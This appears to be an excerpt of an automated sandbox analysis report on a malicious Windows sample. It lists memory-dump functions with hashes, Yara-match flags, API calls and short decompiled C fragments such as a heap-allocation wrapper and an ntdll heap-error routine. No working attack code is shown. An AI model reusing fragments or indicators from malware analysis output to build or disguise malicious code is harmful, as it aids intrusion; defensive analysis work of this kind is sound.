                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 02dd2059a559bd0f27c89ad62c3a3d3d21bcae25daf8596f16d2cdac20b5e9d8
                                                                    • Instruction ID: 722dc9b320cbf81a0678970ec7bccaf977dc45cc387f6b38cb7ae195440fd00e
                                                                    • Opcode Fuzzy Hash: 02dd2059a559bd0f27c89ad62c3a3d3d21bcae25daf8596f16d2cdac20b5e9d8
                                                                    • Instruction Fuzzy Hash: F290026129180052D20075A98C24B0B0055B7D0343FD1C515A0144994CCD5588616561
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 01599A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: add6ffd2ee7bc8ae2973fa45b3f462aa08def524f0201961c620fd6263c107a5
                                                                    • Instruction ID: 0c9119c42f41be9765e3c56b6083bf7a9c9b549037100567e3b3b41ef2a83e2b
                                                                    • Opcode Fuzzy Hash: add6ffd2ee7bc8ae2973fa45b3f462aa08def524f0201961c620fd6263c107a5
                                                                    • Instruction Fuzzy Hash: A390027128140412D1007199882470F0055B7D0342FD1C411A1154995DCA65885175B1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 01599A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 6467e665819541cdc6092f17b1f10ca91f9fb28fae85bf84d35d47a38fd259de
                                                                    • Instruction ID: b01e1b7ac4ce9ef7d35758efff19857be655dfd1c278e5db1bd3a05df8ac1148
                                                                    • Opcode Fuzzy Hash: 6467e665819541cdc6092f17b1f10ca91f9fb28fae85bf84d35d47a38fd259de
                                                                    • Instruction Fuzzy Hash: 2490026168100052414071A9C85490A4055BBE12517D1C521A0988990DC999886566A5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 01599540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: c88cc0c730f70c58575327567ac01a04e147761ed6867706e99b6b750bad3b01
                                                                    • Instruction ID: b88d5c8944f4943e1dff637254a643d96d29a87e75afc34604b1de8c599721fe
                                                                    • Opcode Fuzzy Hash: c88cc0c730f70c58575327567ac01a04e147761ed6867706e99b6b750bad3b01
                                                                    • Instruction Fuzzy Hash: 55900265291000130105B599471450B0096B7D53913D1C421F1005990CDA6188616161
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 015995D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 8c3342f4fe4e4fe1035bf53fdc4beda9e1e99dc52862d6b9d309df24cc357f81
                                                                    • Instruction ID: d1beea0f2f7b44eb6db9e5924a3fae16c2dad8d3d8c7f50ea59af0b4ad336293
                                                                    • Opcode Fuzzy Hash: 8c3342f4fe4e4fe1035bf53fdc4beda9e1e99dc52862d6b9d309df24cc357f81
                                                                    • Instruction Fuzzy Hash: 349002A12820001341057199842461A405AB7E0241BD1C421E10049D0DC96588917165
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 01599710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 84215228efea908357f8c03cbc15f1f5bc961cd661a98fa07ffba3b27908a347
                                                                    • Instruction ID: 68acc7c2cb6f437d204a37301466a034312984c62f8ba6759a12375f37bdd74d
                                                                    • Opcode Fuzzy Hash: 84215228efea908357f8c03cbc15f1f5bc961cd661a98fa07ffba3b27908a347
                                                                    • Instruction Fuzzy Hash: 0790027128100412D10075D9941864A0055B7E0341FD1D411A5014995ECAA588917171
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 01599FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 14f01d77c85b773d02676655feb441ba40dbbad656b363427d4553ac9084d2d5
                                                                    • Instruction ID: 678aa39d0d1e54c6e1436c63be3626c2df286f6318205329a51659a8bb7c63f5
                                                                    • Opcode Fuzzy Hash: 14f01d77c85b773d02676655feb441ba40dbbad656b363427d4553ac9084d2d5
                                                                    • Instruction Fuzzy Hash: 1690027139114412D1107199C41470A0055B7D1241FD1C811A0814998DCAD588917162
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 01599780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 8e56c32d58901eff80433e30ab0d51e5c0b9d734496405d57722fdda2de95b32
                                                                    • Instruction ID: 1e8b2fc457a5f77237784685a7eaae33bb376b716e20a38b98c94db6bd6d39ac
                                                                    • Opcode Fuzzy Hash: 8e56c32d58901eff80433e30ab0d51e5c0b9d734496405d57722fdda2de95b32
                                                                    • Instruction Fuzzy Hash: 0990026929300012D1807199941860E0055B7D1242FD1D815A0005998CCD5588696361
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 015997A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 1aea52d67783b34136f5f8153b5cdd7d7c3f7677e4fafa57ae4fe63937737f62
                                                                    • Instruction ID: 3dc8ae6b21ff793fb9ccb4316c12a07183eb8a2a4ec78fbb2cfb5cdf3f300cc0
                                                                    • Opcode Fuzzy Hash: 1aea52d67783b34136f5f8153b5cdd7d7c3f7677e4fafa57ae4fe63937737f62
                                                                    • Instruction Fuzzy Hash: 6F90026138100013D1407199942860A4055F7E1341FD1D411E0404994CDD5588566262
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 01599660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 61c0d9d8fa9a76b96e52e076d1e1ac3fa7a39fe1da90deecc4bd66ea691a17e6
                                                                    • Instruction ID: a717c3c7abdc42bba76e3cb58a2c97f4b88ac1915205b6b35548eb9ab5bf751b
                                                                    • Opcode Fuzzy Hash: 61c0d9d8fa9a76b96e52e076d1e1ac3fa7a39fe1da90deecc4bd66ea691a17e6
                                                                    • Instruction Fuzzy Hash: 3F90027128100812D1807199841464E0055B7D1341FD1C415A0015A94DCE558A5977E1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 015996E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 9a4adce38273e507ede412059da1bcdecea37121967138013fecf5d79c5fcab0
                                                                    • Instruction ID: 5e126ffbc273526a2d6a31d1223d320a432f4b20fa3d65eae4bad7b60c269c8c
                                                                    • Opcode Fuzzy Hash: 9a4adce38273e507ede412059da1bcdecea37121967138013fecf5d79c5fcab0
                                                                    • Instruction Fuzzy Hash: 6090027128108812D1107199C41474E0055B7D0341FD5C811A4414A98DCAD588917161
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004088E0, Relevance: .1, Instructions: 92COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9486f5e49d764a92f151d77217a9e0cba6cb209ca71685294e9262afbb7a2405
                                                                    • Instruction ID: 226e528ef8d89cf76aa3651449dca84ee2c763c0567bc665b78f2505a73a72ae
                                                                    • Opcode Fuzzy Hash: 9486f5e49d764a92f151d77217a9e0cba6cb209ca71685294e9262afbb7a2405
                                                                    • Instruction Fuzzy Hash: B521F8B2D4420957CB15E6649E42AFF73AC9B50304F04057FE989A2181FA39AB498BA7
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004188C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E004188C0(intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E004191F0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x413546
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}





                                                                    0x004188d7
                                                                    0x004188e2
                                                                    0x004188ed
                                                                    0x004188f1

                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(F5A,?,00413CBF,00413CBF,?,00413546,?,?,?,?,?,00000000,00408B23,?), ref: 004188ED
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID: F5A
                                                                    • API String ID: 1279760036-683449296
                                                                    • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                    • Instruction ID: c53d960059fd60d51188ffd50ae561d8054dda033e2458622c390dbd27fda9b7
                                                                    • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                    • Instruction Fuzzy Hash: 61E012B1200208ABDB14EF99CC85EA777ACAF88654F118559FE085B242C630F914CAB0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00407290, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072EA
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: MessagePostThread
                                                                    • String ID:
                                                                    • API String ID: 1836367815-0
                                                                    • Opcode ID: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                                                                    • Instruction ID: ba3d5bcfed237746ec30380b6ed14dc4a9f69b7da918f5ae44e724b0e7605d49
                                                                    • Opcode Fuzzy Hash: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                                                                    • Instruction Fuzzy Hash: 9C01A771A8032876E721B6959C03FFF776C5B00B55F04011AFF04BA2C2E6A8790687FA
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00418A53, Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFD2,0040CFD2,00000041,00000000,?,00408B95), ref: 00418A90
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LookupPrivilegeValue
                                                                    • String ID:
                                                                    • API String ID: 3899507212-0
                                                                    • Opcode ID: fcdc5623d7d4368ef8f841a9baa8722fcd9ba901bc83185bf29f41fe2183157f
                                                                    • Instruction ID: 4c9bc1d5122e729ebea0a90768cd22131df67a68825705a4834a12e48285c581
                                                                    • Opcode Fuzzy Hash: fcdc5623d7d4368ef8f841a9baa8722fcd9ba901bc83185bf29f41fe2183157f
                                                                    • Instruction Fuzzy Hash: 11E06DB12003196BD720DF89CC86EDB3769AF84650F018169FD0D6B242C931ED098BE1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00418900, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RtlFreeHeap.NTDLL(00000060,00408B23,?,?,00408B23,00000060,00000000,00000000,?,?,00408B23,?,00000000), ref: 0041892D
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FreeHeap
                                                                    • String ID:
                                                                    • API String ID: 3298025750-0
                                                                    • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                    • Instruction ID: 5f54135a6d5665afae9514b011c4f342711cdf5a633985feeb8d835705c457f1
                                                                    • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                    • Instruction Fuzzy Hash: 98E012B1200208ABDB18EF99CC89EA777ACAF88750F018559FE085B242C630E914CAB0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00418A60, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFD2,0040CFD2,00000041,00000000,?,00408B95), ref: 00418A90
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LookupPrivilegeValue
                                                                    • String ID:
                                                                    • API String ID: 3899507212-0
                                                                    • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                    • Instruction ID: b5f2a6165515d53f35f5e56a9475d77ccb8deec25097a7d382054e427d326996
                                                                    • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                    • Instruction Fuzzy Hash: 93E01AB12002086BDB10DF49CC85EE737ADAF88650F018155FE0857242C934E8548BF5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00418940, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418968
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExitProcess
                                                                    • String ID:
                                                                    • API String ID: 621844428-0
                                                                    • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                    • Instruction ID: 1333b191b135ec901ac61a9cb59cf638980f097d56b5f16c626c7f81ecdb5f9b
                                                                    • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                    • Instruction Fuzzy Hash: 52D012716002187BD620DF99CC85FD7779CDF48750F018065BA1C5B242C531BA00C6E1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00418933, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418968
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExitProcess
                                                                    • String ID:
                                                                    • API String ID: 621844428-0
                                                                    • Opcode ID: afc656ac6491a0f145a87c0515414a0bbbd9975d3be51118ec40ae1f2bfbb04f
                                                                    • Instruction ID: 44ce480b178df4900dfd740dccc8e721f533594fb9d6c403b0dcbf16fef5d7df
                                                                    • Opcode Fuzzy Hash: afc656ac6491a0f145a87c0515414a0bbbd9975d3be51118ec40ae1f2bfbb04f
                                                                    • Instruction Fuzzy Hash: 6AE08635600604BBD730DF68CD89FD73B69AF04350F004158B919AB291C130E910CA90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0159967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 5263daaa3e79923232b5243a7ad5db127be6e05fe2279ba3f9f63705ca4be623
                                                                    • Instruction ID: 35cdd9e49f7997f2b2829b9fca70690eb3949dd8f430645db4a28516295ab8d0
                                                                    • Opcode Fuzzy Hash: 5263daaa3e79923232b5243a7ad5db127be6e05fe2279ba3f9f63705ca4be623
                                                                    • Instruction Fuzzy Hash: C3B09B719414C5D5DB11E7A5860871F795077D0745F56C455D1020A81B477CC091F5F6
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Non-executed Functions

                                                                    Function 0160B260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • a NULL pointer, xrefs: 0160B4E0
                                                                    • *** enter .cxr %p for the context, xrefs: 0160B50D
                                                                    • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0160B305
                                                                    • The resource is owned shared by %d threads, xrefs: 0160B37E
                                                                    • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0160B38F
                                                                    • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0160B53F
                                                                    • <unknown>, xrefs: 0160B27E, 0160B2D1, 0160B350, 0160B399, 0160B417, 0160B48E
                                                                    • *** Inpage error in %ws:%s, xrefs: 0160B418
                                                                    • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0160B484
                                                                    • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0160B39B
                                                                    • The critical section is owned by thread %p., xrefs: 0160B3B9
                                                                    • read from, xrefs: 0160B4AD, 0160B4B2
                                                                    • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0160B2DC
                                                                    • *** An Access Violation occurred in %ws:%s, xrefs: 0160B48F
                                                                    • *** then kb to get the faulting stack, xrefs: 0160B51C
                                                                    • an invalid address, %p, xrefs: 0160B4CF
                                                                    • This failed because of error %Ix., xrefs: 0160B446
                                                                    • *** enter .exr %p for the exception record, xrefs: 0160B4F1
                                                                    • Go determine why that thread has not released the critical section., xrefs: 0160B3C5
                                                                    • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0160B323
                                                                    • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0160B314
                                                                    • The instruction at %p tried to %s , xrefs: 0160B4B6
                                                                    • The resource is owned exclusively by thread %p, xrefs: 0160B374
                                                                    • *** Resource timeout (%p) in %ws:%s, xrefs: 0160B352
                                                                    • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0160B476
                                                                    • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0160B3D6
                                                                    • write to, xrefs: 0160B4A6
                                                                    • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0160B47D
                                                                    • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0160B2F3
                                                                    • The instruction at %p referenced memory at %p., xrefs: 0160B432
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                    • API String ID: 0-108210295
                                                                    • Opcode ID: 81ceb894f26e0b4b9e47d93d4c09bf56e721688da0937ff747b2d7a588c68f42
                                                                    • Instruction ID: cf8fa18e2ab94cfd194637f35dc24dc63ba0ad637729341162810a323bebdff7
                                                                    • Opcode Fuzzy Hash: 81ceb894f26e0b4b9e47d93d4c09bf56e721688da0937ff747b2d7a588c68f42
                                                                    • Instruction Fuzzy Hash: CF81067DA80201FFDB2E9A4ACC49D6F3B75FFA6699F418048F5041F292E3758511CA71
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 01611C06, Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 44%
                                                                    			E01611C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x15348a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0155B150();
				} else {
					E0155B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x164589c);
				E0155B150("Heap error detected at %p (heap handle %p)\n",  *0x16458a0);
				_t27 =  *0x1645898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M01611E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0155B150();
				} else {
					E0155B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E0155B150("Error code: %d - %s\n",  *0x1645898);
				_t113 =  *0x16458a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0155B150();
					} else {
						E0155B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0155B150("Parameter1: %p\n",  *0x16458a4);
				}
				_t115 =  *0x16458a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0155B150();
					} else {
						E0155B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0155B150("Parameter2: %p\n",  *0x16458a8);
				}
				_t117 =  *0x16458ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0155B150();
					} else {
						E0155B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0155B150("Parameter3: %p\n",  *0x16458ac);
				}
				_t119 =  *0x16458b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0155B150();
					} else {
						E0155B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x16458b4);
					E0155B150("Last known valid blocks: before - %p, after - %p\n",  *0x16458b0);
				} else {
					_t120 =  *0x16458b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0155B150();
				} else {
					E0155B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E0155B150("Stack trace available at %p\n", 0x16458c0);
			}











                                                                    0x01611c10
                                                                    0x01611c16
                                                                    0x01611c1e
                                                                    0x01611c3d
                                                                    0x01611c3e
                                                                    0x01611c20
                                                                    0x01611c35
                                                                    0x01611c3a
                                                                    0x01611c44
                                                                    0x01611c55
                                                                    0x01611c5a
                                                                    0x01611c65
                                                                    0x01611c67
                                                                    0x00000000
                                                                    0x01611c6e
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x01611c67
                                                                    0x01611cdc
                                                                    0x01611ce5
                                                                    0x01611d04
                                                                    0x01611d05
                                                                    0x01611ce7
                                                                    0x01611cfc
                                                                    0x01611d01
                                                                    0x01611d0b
                                                                    0x01611d17
                                                                    0x01611d1f
                                                                    0x01611d25
                                                                    0x01611d30
                                                                    0x01611d4f
                                                                    0x01611d50
                                                                    0x01611d32
                                                                    0x01611d47
                                                                    0x01611d4c
                                                                    0x01611d61
                                                                    0x01611d67
                                                                    0x01611d68
                                                                    0x01611d6e
                                                                    0x01611d79
                                                                    0x01611d98
                                                                    0x01611d99
                                                                    0x01611d7b
                                                                    0x01611d90
                                                                    0x01611d95
                                                                    0x01611daa
